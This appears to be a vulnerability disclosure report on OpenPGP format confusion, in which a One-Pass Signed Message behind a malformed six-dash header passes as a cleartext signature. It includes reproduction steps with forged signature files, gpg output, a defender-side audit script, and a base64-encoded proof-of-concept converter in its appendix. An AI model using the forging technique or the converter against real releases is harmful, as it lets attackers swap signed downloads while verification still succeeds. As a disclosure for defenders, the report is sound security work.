OpenPGP Cleartext Signature Framework Susceptible to Format Confusion

An attacker can exploit ambiguous OpenPGP format syntax to deceive users into misinterpreting an ASCII-armored One-Pass Signed Message as a Cleartext Signature Framework message through a malformed header.

Impact

This format confusion enables substitution of the original signed data with malicious content while retaining a seemingly valid cryptographic verification. Users and automated checks may unknowingly accept altered or spoofed payloads as authentic, because popular PGP implementations, such as GnuPG, by default do not display the actual data bound by the signature during validation.

Despite documented issues with the Cleartext Signature Framework, and despite GnuPG recommending against it, usage of cleartext signatures remains prevalent.

The attack requires a valid OpenPGP signature over some known, but not attacker-chosen, data.

Details

The attack is to disguise a One-Pass Signed Message (e.g. created through gpg --sign) as a Cleartext Signature Framework message (gpg --clearsign).

RFC 9580 mandates that a One-Pass Signed Message consists of the following packets:

* a One-Pass Signature Packet: unprotected metadata, including:
  * the hash algorithm,
  * the public key algorithm,
  * the short key ID of the signing key.
* a Literal Data Packet: the signed data.
* a Signature Packet: a binding between some public key and some data.

Any OpenPGP signature format containing a valid Signature Packet alongside the signed data, such as the Cleartext Signature Framework, can be converted to a One-Pass Signed Message through:

* forgery of a One-Pass Signature Packet (it contains no cryptographically protected contents), and
* encoding of the signed data in a Literal Data Packet, and
* copying the Signature Packet.

Since the conversion preserves both the signed data and the signature, cryptographic integrity remains intact.
Keying material, whether private or public, is not required to conduct the conversion; a Python script for this procedure is provided in the appendix as a proof of concept.

The attack leverages the ambiguity of the OpenPGP Armor Header Line, which allows a One-Pass Signed Message to be wrapped in either BEGIN PGP MESSAGE or BEGIN PGP SIGNATURE. Additionally, the OpenPGP specification does not mandate a particular handling of non-whitespace characters preceding or following an ASCII-armored OpenPGP message.

A recipient of an OpenPGP signature might therefore be deceived by an adversary through a malformed Armor Header Line into incorrectly assuming that the Cleartext Signature Framework was used. This allows arbitrary data to be stuffed in front of the armored block that the user incorrectly believes to be signed. Common OpenPGP implementations silently discard any superfluous data preceding the One-Pass Signed Message, including malformed Armor Header Lines. The One-Pass Signed Message subsequently passes cryptographic validation. By default GnuPG does not output the signed data during validation, which further helps in deceiving the user.

Detailed steps to reproduce

Scenario

Alice wants to transmit a file (UwUntu.iso) to Bob. Alice wants to assert her authorship and prevent manipulation of the file. Alice has created an OpenPGP keypair and securely transferred her public key to Bob.

Mallory is a threat actor able to intercept and manipulate communications between Alice and Bob. Her goal is to replace the legitimate file (UwUntu.iso) with her malicious one (EnterpriseLinux.iso) while seemingly preserving valid cryptographic verification. UwUntu.iso and EnterpriseLinux.iso differ in their contents and thus in their SHA256 checksums. Mallory possesses neither the private nor the public keying material used by Alice.
Mallory did not interfere with the initial key exchange between Alice and Bob.

Procedure

Alice decides to clearsign the SHA256 checksum of UwUntu.iso:

sha256sum --status UwUntu.iso --tag | gpg --clearsign --local-user [email protected] --armor | tee UwUntu.iso-CHECKSUM

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

SHA256 (UwUntu.iso) = e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
-----BEGIN PGP SIGNATURE-----

iHUEARYKAB0WIQToHhAB/IMVCMWsfO8A2ANj0QlJcwUCaGqR4AAKCRAA2ANj0QlJ
c0I9AP4qiHxx+D90OGDEGFcdSkjiUSD/fLhlYoVDiHhnPSzHbwEAuyUxrYYg23kA
VHK9nCInS1fNKbWo8NiedYVOXnISOgs=
=a6YF
-----END PGP SIGNATURE-----

Alice then starts transmission of UwUntu.iso and UwUntu.iso-CHECKSUM to Bob.

Mallory intercepts this transmission. She then converts the Cleartext Signature to a One-Pass Signed Message, which she disguises as a Cleartext Signature (note the six trailing dashes of the first line):

$ python fake-signature/main.py ./UwUntu.iso-CHECKSUM /dev/stdout

-----BEGIN PGP SIGNED MESSAGE------
Hash: SHA512

-----BEGIN PGP SIGNATURE-----

kA0DAQoWANgDY9EJSXMBrFx0AGhqkeBTSEEyNTYgKFV3VW50dS5pc28pID0gZTNi
MGM0NDI5OGZjMWMxNDlhZmJmNGM4OTk2ZmI5MjQyN2FlNDFlNDY0OWI5MzRjYTQ5
NTk5MWI3ODUyYjg1NYh1BAEWCgAdFiEE6B4QAfyDFQjFrHzvANgDY9EJSXMFAmhq
keAACgkQANgDY9EJSXNCPQD+Koh8cfg/dDhgxBhXHUpI4lEg/3y4ZWKFQ4h4Zz0s
x28BALslMa2GINt5AFRyvZwiJ0tXzSm1qPDYnnWFTl5yEjoL
=//2u
-----END PGP SIGNATURE-----

Mallory then fills the empty cleartext part with the checksum tag of her malicious EnterpriseLinux.iso:

-----BEGIN PGP SIGNED MESSAGE------
Hash: SHA512

SHA256 (UwUntu.iso) = 62545c1551bcc06a72163775203d9163f46e47930cd024b4df270afa11a57ba9
-----BEGIN PGP SIGNATURE-----

kA0DAQoWANgDY9EJSXMBrFx0AGhqkeBTSEEyNTYgKFV3VW50dS5pc28pID0gZTNi
MGM0NDI5OGZjMWMxNDlhZmJmNGM4OTk2ZmI5MjQyN2FlNDFlNDY0OWI5MzRjYTQ5
NTk5MWI3ODUyYjg1NYh1BAEWCgAdFiEE6B4QAfyDFQjFrHzvANgDY9EJSXMFAmhq
keAACgkQANgDY9EJSXNCPQD+Koh8cfg/dDhgxBhXHUpI4lEg/3y4ZWKFQ4h4Zz0s
x28BALslMa2GINt5AFRyvZwiJ0tXzSm1qPDYnnWFTl5yEjoL
=//2u
-----END PGP SIGNATURE-----

Mallory replaces the contents of UwUntu.iso with those of EnterpriseLinux.iso. Having modified both UwUntu.iso and the signature file UwUntu.iso-CHECKSUM, Mallory forwards the files to Bob.

Bob verifies the signature:

$ cat ./UwUntu.iso-CHECKSUM | gpg --verify
gpg: Signature made Sun Jul 6 17:10:24 2025 CEST
gpg: using EDDSA key E81E1001FC831508C5AC7CEF00D80363D1094973
gpg: Good signature from "Alice <[email protected]>" [ultimate]

Confident of the legitimacy of UwUntu.iso-CHECKSUM, Bob verifies that UwUntu.iso actually matches UwUntu.iso-CHECKSUM:

sha256sum --check UwUntu.iso-CHECKSUM
UwUntu.iso: OK

Mallory's attack succeeded: she deceived Bob into believing the manipulated UwUntu.iso to be cryptographically signed by Alice.

The verification process involving cleartext signatures and SHA256 checksums is used by multiple well-known software distributions and exists beyond the scope of this theoretical example.

Recommendations

Removal of the Cleartext Signature Framework from the OpenPGP standard resolves the issues with the Cleartext Signature Framework. Furthermore, deprecation allows for a graceful phase-out.

OpenPGP users should avoid using cleartext signatures, as is also recommended by GnuPG.

To prevent confusion about the actual signed data, OpenPGP implementations should output the data bound by the signature during validation by default. sequoia-sq does so. GnuPG does not and requires the --output option to be set.

When working with OpenPGP signatures in general, users should instruct their PGP implementation to output the signed data and only use this output for any further or related tasks.
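As an added defender-side example (not the advisory's PoC script, and not GnuPG or Sequoia code), the following Python audits a clearsigned file the way the Details and Recommendations sections suggest a careful verifier should: it insists on the exact Armor Header Line, decodes the armored block, walks the packet headers to see whether the block holds only Signature packets (tag 2) or a One-Pass Signature packet (tag 4) plus a Literal Data packet (tag 11), and, where literal data is present, extracts it and compares it with the visible cleartext. The two embedded messages are the clearsigned checksum and the disguised One-Pass Signed Message exactly as printed in the Procedure above; the function names, the report layout and the decision to skip (rather than verify) the optional "=CRC" line are this example's own.

```python
import base64

TAG_SIGNATURE, TAG_ONE_PASS, TAG_LITERAL = 2, 4, 11        # packet type IDs, RFC 9580 s5
CLEARSIGN_HEADER = "-----BEGIN PGP SIGNED MESSAGE-----"    # exact: five dashes each side
SIG_BEGIN, SIG_END = "-----BEGIN PGP SIGNATURE-----", "-----END PGP SIGNATURE-----"


def packets(data: bytes):
    """Yield (tag, body) per packet; legacy and OpenPGP headers, fixed lengths only."""
    pos = 0
    while pos < len(data):
        first = data[pos]
        if (first & 0xC0) == 0xC0:                     # OpenPGP format: tag in low 6 bits
            tag, lb = first & 0x3F, data[pos + 1]
            if lb < 192:
                length, pos = lb, pos + 2
            elif lb < 224:
                length, pos = ((lb - 192) << 8) + data[pos + 2] + 192, pos + 3
            elif lb == 255:
                length, pos = int.from_bytes(data[pos + 2:pos + 6], "big"), pos + 6
            else:
                raise ValueError("partial body lengths not supported")
        elif (first & 0x80) and (first & 0x03) != 3:   # legacy format: tag in bits 5..2
            tag, n = (first >> 2) & 0x0F, 1 << (first & 0x03)   # 1-, 2- or 4-octet length
            length, pos = int.from_bytes(data[pos + 1:pos + 1 + n], "big"), pos + 1 + n
        else:
            raise ValueError("unsupported packet header at offset %d" % pos)
        body, pos = data[pos:pos + length], pos + length
        if len(body) != length:
            raise ValueError("truncated packet")
        yield tag, body


def audit_clearsigned(text: str) -> dict:
    """Report what the armored block really holds and whether it covers the visible text."""
    lines = text.splitlines()
    report = {"header_ok": lines[:1] == [CLEARSIGN_HEADER], "tags": [],
              "literal_text": None, "cleartext_matches_literal": None, "findings": []}
    if not report["header_ok"]:
        report["findings"].append("first line is not the exact CSF header: %r" % lines[:1])
    try:
        sig_start, sig_end = lines.index(SIG_BEGIN), lines.index(SIG_END)
    except ValueError:
        report["findings"].append("no armored signature block")
        return report
    # Visible cleartext in canonical form: after the blank line that ends the Hash:
    # headers, dash-escaping undone, trailing whitespace dropped.
    blank = lines.index("") if "" in lines[:sig_start] else 0
    cleartext = "\n".join((ln[2:] if ln.startswith("- ") else ln).rstrip(" \t")
                          for ln in lines[blank + 1:sig_start])
    # Armored payload: skip blank lines, armor headers and the optional "=CRC" line.
    b64 = "".join(ln for ln in lines[sig_start + 1:sig_end]
                  if ln and ": " not in ln and not ln.startswith("="))
    for tag, body in packets(base64.b64decode(b64, validate=True)):
        report["tags"].append(tag)
        if tag == TAG_LITERAL:   # body: format octet, name length + name, 4-octet date, data
            report["literal_text"] = body[2 + body[1] + 4:].decode("utf-8", "replace")
    foreign = [t for t in report["tags"] if t != TAG_SIGNATURE]
    if foreign:
        report["findings"].append("non-signature packets %s in the signature block: this is a "
                                  "One-Pass Signed Message, not a cleartext signature" % foreign)
    if report["literal_text"] is not None:
        report["cleartext_matches_literal"] = report["literal_text"].rstrip("\r\n") == cleartext
        if not report["cleartext_matches_literal"]:
            report["findings"].append("the visible cleartext is not the data the signature covers")
    return report


# Constructed samples: Alice's clearsigned checksum and Mallory's disguised
# One-Pass Signed Message, copied from the Procedure section of the advisory.
LEGIT_CLEARSIGNED = """\
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

SHA256 (UwUntu.iso) = e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
-----BEGIN PGP SIGNATURE-----

iHUEARYKAB0WIQToHhAB/IMVCMWsfO8A2ANj0QlJcwUCaGqR4AAKCRAA2ANj0QlJ
c0I9AP4qiHxx+D90OGDEGFcdSkjiUSD/fLhlYoVDiHhnPSzHbwEAuyUxrYYg23kA
VHK9nCInS1fNKbWo8NiedYVOXnISOgs=
=a6YF
-----END PGP SIGNATURE-----
"""
FORGED_CLEARSIGNED = """\
-----BEGIN PGP SIGNED MESSAGE------
Hash: SHA512

SHA256 (UwUntu.iso) = 62545c1551bcc06a72163775203d9163f46e47930cd024b4df270afa11a57ba9
-----BEGIN PGP SIGNATURE-----

kA0DAQoWANgDY9EJSXMBrFx0AGhqkeBTSEEyNTYgKFV3VW50dS5pc28pID0gZTNi
MGM0NDI5OGZjMWMxNDlhZmJmNGM4OTk2ZmI5MjQyN2FlNDFlNDY0OWI5MzRjYTQ5
NTk5MWI3ODUyYjg1NYh1BAEWCgAdFiEE6B4QAfyDFQjFrHzvANgDY9EJSXMFAmhq
keAACgkQANgDY9EJSXNCPQD+Koh8cfg/dDhgxBhXHUpI4lEg/3y4ZWKFQ4h4Zz0s
x28BALslMa2GINt5AFRyvZwiJ0tXzSm1qPDYnnWFTl5yEjoL
=//2u
-----END PGP SIGNATURE-----
"""

if __name__ == "__main__":
    for name, msg in (("legit", LEGIT_CLEARSIGNED), ("forged", FORGED_CLEARSIGNED)):
        print(name, audit_clearsigned(msg))
```

For Alice's file the report lists tags [2] and no findings. For Mallory's file it lists tags [4, 11, 2], flags the six-dash header, and shows that the data the signature actually covers is the e3b0... checksum line, not the 6254... line Bob saw; that extracted literal text is the only thing a checksum verification should be fed, which is what the Recommendations ask implementations to output by default.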
Credits

* Finder credits: 49016
* PoC & writeup: 49016, Flüpke, Sivizius, Liam

Appendix

fake-signature.tar.xz.b64:

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 yi0RscRn+wIAAAAABFla

--------------------------------------------------------------------------

Disclosure Timeline:

* 21.10.2025: Submission of initial version of this report.

Upcoming Timeline:

* 24.10.2025: Submission of a talk for the 39th Chaos Communication Congress (39C3). No technical details shared.
* 21.12.2025: Disclosure of this report on https://seclists.org/fulldisclosure/
* 26-31.12.2025: If accepted by the content team, 39C3 talk regarding this report.

Please note: While we might be able to offer some flexibility, our plan is to adhere to the above stated upcoming timeline, regardless of the availability of patches or fixes.

We kindly request allocation of a CVE number to track this issue. Please keep us updated regarding your remediation efforts.

